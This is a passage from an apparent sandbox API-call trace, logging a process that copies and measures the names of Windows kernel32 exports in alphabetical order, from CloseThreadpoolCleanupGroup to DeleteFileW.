returned="CloseThreadpoolCleanupGroup" [0082.324] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.324] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.325] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.325] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.325] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.325] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.325] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.325] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.325] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.325] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.325] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.325] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.325] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.325] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.325] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.325] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.325] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.325] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.325] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.325] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.326] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.326] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.326] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.326] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.326] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.326] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.326] lstrlenA (lpString="COPYFILEA") returned 9 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.326] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.326] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.326] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.326] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.326] lstrlenA (lpString="COPYFILEW") returned 9 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.326] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.326] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.326] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.326] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.326] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.326] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.327] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.327] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.327] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.327] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.327] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.327] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.327] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.327] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.327] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.327] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.327] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.327] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.327] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.327] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.327] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.327] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.327] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.327] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.327] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.328] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.328] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.328] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.328] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.328] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.328] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.328] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.328] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.328] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.328] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.328] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.328] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.328] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.328] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.328] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.328] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.328] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.328] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.329] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.329] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.329] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.329] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.329] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.329] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.329] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.329] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.329] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.329] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.329] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.329] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.329] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.329] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.329] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.329] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.329] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.329] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.329] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.330] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.330] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.330] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.330] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.330] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.330] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.330] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.330] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.330] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.330] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.330] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.330] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.330] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.330] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.330] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.330] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.330] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.330] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.331] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.331] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.331] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.331] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.331] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.331] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.331] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.331] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.331] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.331] lstrlenA (lpString="DELETEATOM") returned 10 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.331] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.331] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.331] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.331] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.331] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.331] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.331] lstrlenA 